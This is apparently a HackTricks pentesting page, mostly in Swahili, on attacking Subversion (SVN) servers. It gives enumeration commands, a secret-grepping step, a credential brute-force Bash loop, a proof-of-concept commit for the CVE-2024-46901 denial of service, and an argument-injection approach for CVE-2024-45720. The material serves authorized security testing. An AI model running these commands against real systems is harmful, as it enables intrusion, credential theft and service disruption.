3690/tcp - Pentesting Seva ya Subversion (SVN)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Subversion (SVN) ni mfumo wa udhibiti wa matoleo wa kati (leseni ya Apache) unaotumika kwa kuendesha matoleo ya programu na udhibiti wa marekebisho.

Bandari ya chaguo-msingi: 3690/tcp (svnserve). Pia inaweza kufunguliwa kupitia HTTP/HTTPS kwa mod_dav_svn na kupitia svn+ssh.

PORT     STATE SERVICE
3690/tcp open  svnserve Subversion

Banner Grabbing

nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages

Enumeration

# Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

# If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

# Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo

Auth & Misconfig Hunting

• svnserve.conf inaweza kuruhusu anon-access = read (au hata write). Ikiwa unaweza kuorodhesha, jaribu checkout ili kudumpa secrets, scripts, CI tokens.
• Repositories mara nyingi huhifadhi build pipelines, deployment keys, na database credentials katika versioned config files. Grep the working copy after checkout: grep -R "password\|secret\|token" -n ..
• Ikiwa svn+ssh imewezeshwa, shells za watumiaji mara nyingi huruhusu amri za svnserve zilizopunguzwa; jaribu ssh user@host svnserve -t na subcommands zilizotengenezwa ili kupitisha wrappers.

Bruteforcing credentials (svnserve)

sasl authentication (if enabled) and simple password files are protected only by the transport; no lockout by default. A quick Bash loop can try credentials:

for u in admin dev ci; do
for p in $(cat /tmp/passlist); do
svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
done
done

Udhaifu za Hivi Karibuni (athari za vitendo)

mod_dav_svn DoS kwa kutumia control characters (CVE-2024-46901)

• Mtumiaji mwenye haki za commit anaweza kuandika path yenye control chars (mfano \x01, \x7f) ambayo inaharibu repository, na kusababisha checkouts/logs baadaye kushindwa na hata kusababisha crash ya workers wa mod_dav_svn.
• Inamhusu Subversion ≤ 1.14.4 ikitumwa kupitia HTTP(S) (mod_dav_svn). Imefixiwa katika 1.14.5.
• PoC commit kwa kutumia svnmucc (requires valid commit creds):

# create payload file
printf 'pwn' > /tmp/payload
# commit a path with a control character in its name
svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'

• Baada ya commit, wateja wa kawaida wanaweza kuanguka au kukataa masasisho hadi wasimamizi waondoe kwa mkono revision kwa kutumia svnadmin dump/filter/load.

Windows argument injection in svn client (CVE-2024-45720)

• On Windows, “best-fit” character encoding in svn.exe inaruhusu command-line argument injection wakati inapotumia paths/URLs zisizo za ASCII zilizotengenezwa kwa njia maalumu, na kuna uwezekano wa kusababisha arbitrary program execution.
• Inaathiri Subversion ≤ 1.14.3 kwenye Windows pekee; imerekebishwa katika 1.14.4. Attack surface: phishing a developer ili aendeshe svn kwenye attacker-controlled URL/path.
• Pentest angle: ikiwa unadhibiti network share au ZIP uliotolewa kwa Windows dev, ipa jina repo URL au working-copy path lenye best-fit bytes zinazo decode kuwa " & calc.exe & "-style injected args, kisha trick mhanga aendeshe svn status au kitu kinachofanana kwenye path hiyo.

Notes for Exploitation Workflow

1. Check access method: svn:// (svnserve), http(s)://.../svn/ (mod_dav_svn), or svn+ssh://.
2. Try anonymous read first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
3. Enumerate hooks: hooks/pre-commit, post-commit scripts sometimes contain plaintext credentials or hostnames.
4. Leverage svn:externals to pull additional paths from other hosts; list them with svn propget svn:externals -R . after checkout.
5. Version leaks: HTTP response headers from mod_dav_svn usually show the Subversion & Apache version; compare against 1.14.5 to spot vuln targets.
6. If you obtain filesystem access to the repo, svnadmin dump/svnlook author/svnlook dirs-changed allow offline analysis without credentials.

Marejeo

• Apache Subversion security advisory CVE-2024-46901
• Apache Subversion security advisory CVE-2024-45720

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.